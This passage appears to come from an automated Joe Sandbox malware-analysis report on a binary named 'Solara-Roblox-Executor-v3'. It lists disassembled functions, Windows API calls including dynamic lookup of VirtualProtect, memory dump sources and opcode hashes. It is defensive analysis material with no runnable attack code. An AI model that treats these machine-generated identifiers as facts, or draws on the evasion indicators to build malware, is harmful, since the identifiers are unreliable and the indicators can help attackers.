                                                                                          • __EH_prolog3.LIBCMT ref: 002F77F9
                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 002F7804
                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 002F7872
                                                                                            • Part of subcall function 002F76EF: std::locale::_Locimp::_Locimp.LIBCPMT ref: 002F7707
                                                                                          • std::locale::_Setgloballocale.LIBCPMT ref: 002F781F
                                                                                          • _Yarn.LIBCPMT ref: 002F7835
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2022971147.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000003.00000002.2022954606.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2022998411.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023013624.0000000000320000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023031226.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023048343.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                          • String ID: Pq/
                                                                                          • API String ID: 1088826258-235438668
                                                                                          • Opcode ID: c52166765d52a03d462c09ce8c6601537f1f299ab86d8b483541023d6baa8f9b
                                                                                          • Instruction ID: 5adf40ed71c8e9dfb4ffe39cf687f58f2dda118b0243193acc01fb2b7f2f8de8
                                                                                          • Opcode Fuzzy Hash: c52166765d52a03d462c09ce8c6601537f1f299ab86d8b483541023d6baa8f9b
                                                                                          • Instruction Fuzzy Hash: 4F01B175A141199BC70AEF20D9455BDBB66BFD93C0F14006DEA0257391CF349E62CF81
                                                                                          APIs
                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BB40E64E,?,?,00000000,00315684,000000FF,?,002FF2B9,002FF1A0,?,002FF355,00000000), ref: 002FF22D
                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,00000000,00315684,000000FF,?,002FF2B9,002FF1A0,?,002FF355,00000000), ref: 002FF23F
                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000,00315684,000000FF,?,002FF2B9,002FF1A0,?,002FF355,00000000), ref: 002FF261
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2022971147.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000003.00000002.2022954606.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2022998411.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023013624.0000000000320000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023031226.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023048343.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                          • String ID: CorExitProcess$Pq/$mscoree.dll
                                                                                          • API String ID: 4061214504-917158328
                                                                                          • Opcode ID: 1ece1702947f741583cb7f3a6271a95d1ff994ac165f927ae4e4d23b2a84e56c
                                                                                          • Instruction ID: 5464d5ac3bc1c5591a60e20b11fddc22f85a8dfb55e9fafc6f0196a3fd278a0f
                                                                                          • Opcode Fuzzy Hash: 1ece1702947f741583cb7f3a6271a95d1ff994ac165f927ae4e4d23b2a84e56c
                                                                                          • Instruction Fuzzy Hash: AF018F35950669AFDB168F54DC09BEEBBB8FB48B51F044639ED11A22D0DB759900CA80
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2022971147.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000003.00000002.2022954606.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2022998411.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023013624.0000000000320000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023031226.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023048343.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 18d1f65c582e33d60484bfee0db44afd592a68bdc35443aa3adaa6353a980d5e
                                                                                          • Instruction ID: 59b80e2238a563632371cb9d183575159ee21c0602e13858a87bee7d0f0f285f
                                                                                          • Opcode Fuzzy Hash: 18d1f65c582e33d60484bfee0db44afd592a68bdc35443aa3adaa6353a980d5e
                                                                                          • Instruction Fuzzy Hash: E1B1D474A04249AFDB1BEF98CC51BEEBBB5BF4D310F144158E8059B292C7719E82CB60
                                                                                          APIs
                                                                                          • GetLastError.KERNEL32(?,?,00304464,002FA97D,002F9BD4), ref: 0030447B
                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00304489
                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 003044A2
                                                                                          • SetLastError.KERNEL32(00000000,00304464,002FA97D,002F9BD4), ref: 003044F4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2022971147.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000003.00000002.2022954606.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2022998411.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023013624.0000000000320000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023031226.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023048343.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLastValue___vcrt_
                                                                                          • String ID:
                                                                                          • API String ID: 3852720340-0
                                                                                          • Opcode ID: aa434cc284674cb587b289cd3791fc6455f059de44681006a5815a57a3a7cbb0
                                                                                          • Instruction ID: 274bb2ece3b39300186914fdc91070631315c06ae7ec1d727503826cccd72438
                                                                                          • Opcode Fuzzy Hash: aa434cc284674cb587b289cd3791fc6455f059de44681006a5815a57a3a7cbb0
                                                                                          • Instruction Fuzzy Hash: 1301D47220B7166EF73B2B76BCA5A6B2788EB41774F21023DFA11594F2EF124D469240
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2022971147.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000003.00000002.2022954606.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2022998411.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023013624.0000000000320000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023031226.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023048343.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: AdjustPointer
                                                                                          • String ID: Pq/
                                                                                          • API String ID: 1740715915-235438668
                                                                                          • Opcode ID: f076e848f906efc686ae46eadc9a85d995cdca8f242495f7a7bb77f274220101
                                                                                          • Instruction ID: e832066d6a829be8d56f79a9e342e5fde14eb1a814dce6a6fe3970edab2bb69c
                                                                                          • Opcode Fuzzy Hash: f076e848f906efc686ae46eadc9a85d995cdca8f242495f7a7bb77f274220101
                                                                                          • Instruction Fuzzy Hash: 645105F2606206AFDB2A8F50D8A1BBAB7A8EF04310F15452DEB45476D1D731EE50CB50
                                                                                          APIs
                                                                                          • __alloca_probe_16.LIBCMT ref: 00306EAF
                                                                                          • __alloca_probe_16.LIBCMT ref: 00306F78
                                                                                          • __freea.LIBCMT ref: 00306FDF
                                                                                            • Part of subcall function 003056F1: HeapAlloc.KERNEL32(00000000,00307675,?,?,00307675,00000220,?,?,?), ref: 00305723
                                                                                          • __freea.LIBCMT ref: 00306FF2
                                                                                          • __freea.LIBCMT ref: 00306FFF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2022971147.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000003.00000002.2022954606.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2022998411.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023013624.0000000000320000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023031226.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023048343.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                          • String ID:
                                                                                          • API String ID: 1096550386-0
                                                                                          • Opcode ID: b041bf7020ecbe2d2aac9d7c67e65fca348672740b23ad46a3595970f15d7ae6
                                                                                          • Instruction ID: a0a49f98b9bef3cccc85cf02c4617391e6f08627812d0c839875437a249a399e
                                                                                          • Opcode Fuzzy Hash: b041bf7020ecbe2d2aac9d7c67e65fca348672740b23ad46a3595970f15d7ae6
                                                                                          • Instruction Fuzzy Hash: C251C57260224BAFDB229F65DC62EBB7AADEF44750B160138FD04D6195EB31DC70CA60
                                                                                          APIs
                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 00304C53
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2022971147.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000003.00000002.2022954606.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2022998411.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023013624.0000000000320000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023031226.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023048343.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: ___except_validate_context_record
                                                                                          • String ID: Pq/$csm$csm
                                                                                          • API String ID: 3493665558-730250864
                                                                                          • Opcode ID: 30096fd3b235c13a08d79907d845b06f782269a1d36f0d5be9c659e9e70a24b3
                                                                                          • Instruction ID: 16d26096d88cd589c83425e7f0a1c6741f06e0d2c284a79a4f949a6c62786931
                                                                                          • Opcode Fuzzy Hash: 30096fd3b235c13a08d79907d845b06f782269a1d36f0d5be9c659e9e70a24b3
                                                                                          • Instruction Fuzzy Hash: 6A3139B2413208EBCF239F40DC1496E7B66FF48315B1A4259FE140E1A2C332CEA1DB81
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2022971147.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000003.00000002.2022954606.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2022998411.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023013624.0000000000320000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023031226.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023048343.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressProc
                                                                                          • String ID: @$Pq/$VirtualProtect
                                                                                          • API String ID: 190572456-3626776695
                                                                                          • Opcode ID: 663d33104bc252a384dae2bb46bedaf037feda23c35e2d835db6daaca92e2b9e
                                                                                          • Instruction ID: 6efb39f30c2a73682dc3d04930f98e1f595bd9538fc821bb548c1f70645aa7ba
                                                                                          • Opcode Fuzzy Hash: 663d33104bc252a384dae2bb46bedaf037feda23c35e2d835db6daaca92e2b9e
                                                                                          • Instruction Fuzzy Hash: D941D2B0901209DFDB04DFA9D5986EEBBF4FF08354F108429E848AB351D7759949CF91
                                                                                          APIs
                                                                                          • __EH_prolog3.LIBCMT ref: 002F8FA1
                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 002F8FAB
                                                                                            • Part of subcall function 002F3990: std::_Lockit::_Lockit.LIBCPMT ref: 002F39BE
                                                                                            • Part of subcall function 002F3990: std::_Lockit::~_Lockit.LIBCPMT ref: 002F39E9
                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 002F901C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2022971147.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000003.00000002.2022954606.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2022998411.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023013624.0000000000320000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023031226.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023048343.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                                          • String ID: Pq/
                                                                                          • API String ID: 1383202999-235438668
                                                                                          • Opcode ID: 0356974ce2b5783076fc55cb83583832d88ea95cd3f5ecc2133d1a0ddffba145
                                                                                          • Instruction ID: fe619d2017b8b345858c6f9a538db9382ac32bfa3c343d29c04f04c8b067f34a
                                                                                          • Opcode Fuzzy Hash: 0356974ce2b5783076fc55cb83583832d88ea95cd3f5ecc2133d1a0ddffba145
                                                                                          • Instruction Fuzzy Hash: EE01043692011D8BCB05EF64D811ABEF765AF84390F240528FA1167291CF709E628F81
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2022971147.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000003.00000002.2022954606.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2022998411.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023013624.0000000000320000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023031226.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023048343.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressHandleModuleProc
                                                                                          • String ID: FreeConsole$kernel32.dll
                                                                                          • API String ID: 1646373207-2564406000
                                                                                          • Opcode ID: 723090d6281a1236e1593f80e06ffeacdeb3d252649b99507ae38d169b8bb457
                                                                                          • Instruction ID: 5e37eb1cb4c5440cf06a1bbe27d7e5c0606912c9c190fad6ce9ae0b106405ce5
                                                                                          • Opcode Fuzzy Hash: 723090d6281a1236e1593f80e06ffeacdeb3d252649b99507ae38d169b8bb457
                                                                                          • Instruction Fuzzy Hash: D301B6709002089FCB01EFBCD94559DBBF8AB48300F40856AE849D7351EB34A6588F82
                                                                                          APIs
                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,0030F74C,00000000,?,00321E20,?,?,?,0030F683,00000004,InitializeCriticalSectionEx,003190D4,003190DC), ref: 0030F6BD
                                                                                          • GetLastError.KERNEL32(?,0030F74C,00000000,?,00321E20,?,?,?,0030F683,00000004,InitializeCriticalSectionEx,003190D4,003190DC,00000000,?,0030539C), ref: 0030F6C7
                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0030F6EF
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2022971147.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000003.00000002.2022954606.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2022998411.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023013624.0000000000320000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023031226.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023048343.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                          • String ID: api-ms-
                                                                                          • API String ID: 3177248105-2084034818
                                                                                          • Opcode ID: a8cf60a207f48df36a2297b03077ed9fe12a0f091135c3aa13dc68e7c475b790
                                                                                          • Instruction ID: 673b45aa6e689c056de9bf8afa637749a640298dd0a43d3a058c8046cf782d98
                                                                                          • Opcode Fuzzy Hash: a8cf60a207f48df36a2297b03077ed9fe12a0f091135c3aa13dc68e7c475b790
                                                                                          • Instruction Fuzzy Hash: F6E04830281209BBEB331B61DC0AF983B589B04B50F254030FE0CA84F1DBA399949584
                                                                                          APIs
                                                                                          • GetConsoleOutputCP.KERNEL32(BB40E64E,00000000,00000000,?), ref: 0030D7B1
                                                                                            • Part of subcall function 00305801: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00306FD5,?,00000000,-00000008), ref: 00305862
                                                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0030DA03
                                                                                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0030DA49
                                                                                          • GetLastError.KERNEL32 ref: 0030DAEC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2022971147.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000003.00000002.2022954606.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2022998411.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023013624.0000000000320000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023031226.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023048343.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                          • String ID:
                                                                                          • API String ID: 2112829910-0
                                                                                          • Opcode ID: aa9f92c606b7881ff9c97d88df2c8f2216ea6e581127d4d692cb789f3e545ef3
                                                                                          • Instruction ID: 3b5e2853c1d91fae6da5bf354677a1794b0741c4fb939ec9e5663346d7bf8ad9
                                                                                          • Opcode Fuzzy Hash: aa9f92c606b7881ff9c97d88df2c8f2216ea6e581127d4d692cb789f3e545ef3
                                                                                          • Instruction Fuzzy Hash: 78D14A75E052489FCB16CFE8C8909EEBBF9FF08314F24416AE455EB291D730A941CB50
                                                                                          APIs
                                                                                            • Part of subcall function 00305801: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00306FD5,?,00000000,-00000008), ref: 00305862
                                                                                          • GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 0030B5DA
                                                                                          • __dosmaperr.LIBCMT ref: 0030B5E1
                                                                                          • GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 0030B61B
                                                                                          • __dosmaperr.LIBCMT ref: 0030B622
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2022971147.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000003.00000002.2022954606.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2022998411.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023013624.0000000000320000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023031226.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023048343.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                          • String ID:
                                                                                          • API String ID: 1913693674-0
                                                                                          • Opcode ID: 4f495e21f535bafe5933d5322089073cbe43df9b174f513a34f466cd9147fe0b
                                                                                          • Instruction ID: eb89c2a04d00236cf062da9c45ff5c47d17ca447c30883d58747664a0b4fba56
                                                                                          • Opcode Fuzzy Hash: 4f495e21f535bafe5933d5322089073cbe43df9b174f513a34f466cd9147fe0b
                                                                                          • Instruction Fuzzy Hash: 5F21C271602209AFDB22AF65CCA0CABF7ACFF053647118468F919D75D0E732EC408BA4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2022971147.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000003.00000002.2022954606.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2022998411.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023013624.0000000000320000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023031226.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023048343.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4c94a707f6b129384865c5f135a76044c7033cfb0f2b638fbe2cff50eb85eae9
                                                                                          • Instruction ID: 4a8204428d7f047a18e01d8e4f906484216aa2a122bcf44f360b225e75a7b053
                                                                                          • Opcode Fuzzy Hash: 4c94a707f6b129384865c5f135a76044c7033cfb0f2b638fbe2cff50eb85eae9
                                                                                          • Instruction Fuzzy Hash: DE21807122020EAFDB11EF74CD519BAF7A8EF403A47208524FA16C7550DB71FC608B60
                                                                                          APIs
                                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 0030C976
                                                                                            • Part of subcall function 00305801: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00306FD5,?,00000000,-00000008), ref: 00305862
                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0030C9AE
                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0030C9CE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2022971147.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000003.00000002.2022954606.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2022998411.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023013624.0000000000320000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023031226.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023048343.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                          • String ID:
                                                                                          • API String ID: 158306478-0
                                                                                          • Opcode ID: 99d8d60c8dec36795fe67f25a765498717992fcf992c2cedc8ff641fc6043aea
                                                                                          • Instruction ID: 86431c51ab962513408612365fffe231b11f54c46717b7f6ea055fd0b1fc018d
                                                                                          • Opcode Fuzzy Hash: 99d8d60c8dec36795fe67f25a765498717992fcf992c2cedc8ff641fc6043aea
                                                                                          • Instruction Fuzzy Hash: 7A11C4F2A1361D7FE71367B65CADCBF799CDE893947215215F801D5181FA22CD0189B0
                                                                                          APIs
                                                                                          • WriteConsoleW.KERNEL32(00000000,?,?,00000000,00000000,?,003139DF,00000000,00000001,?,?,?,0030DB40,?,00000000,00000000), ref: 003144A7
                                                                                          • GetLastError.KERNEL32(?,003139DF,00000000,00000001,?,?,?,0030DB40,?,00000000,00000000,?,?,?,0030D486,?), ref: 003144B3
                                                                                            • Part of subcall function 00314510: CloseHandle.KERNEL32(FFFFFFFE,003144C3,?,003139DF,00000000,00000001,?,?,?,0030DB40,?,00000000,00000000,?,?), ref: 00314520
                                                                                          • ___initconout.LIBCMT ref: 003144C3
                                                                                            • Part of subcall function 003144E5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00314481,003139CC,?,?,0030DB40,?,00000000,00000000,?), ref: 003144F8
                                                                                          • WriteConsoleW.KERNEL32(00000000,?,?,00000000,?,003139DF,00000000,00000001,?,?,?,0030DB40,?,00000000,00000000,?), ref: 003144D8
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2022971147.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000003.00000002.2022954606.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2022998411.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023013624.0000000000320000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023031226.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023048343.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                          • String ID:
                                                                                          • API String ID: 2744216297-0
                                                                                          • Opcode ID: 39d2a3a883bdcc76d94be3b095264aa631e4d844b145ca191bec13d37be3ff53
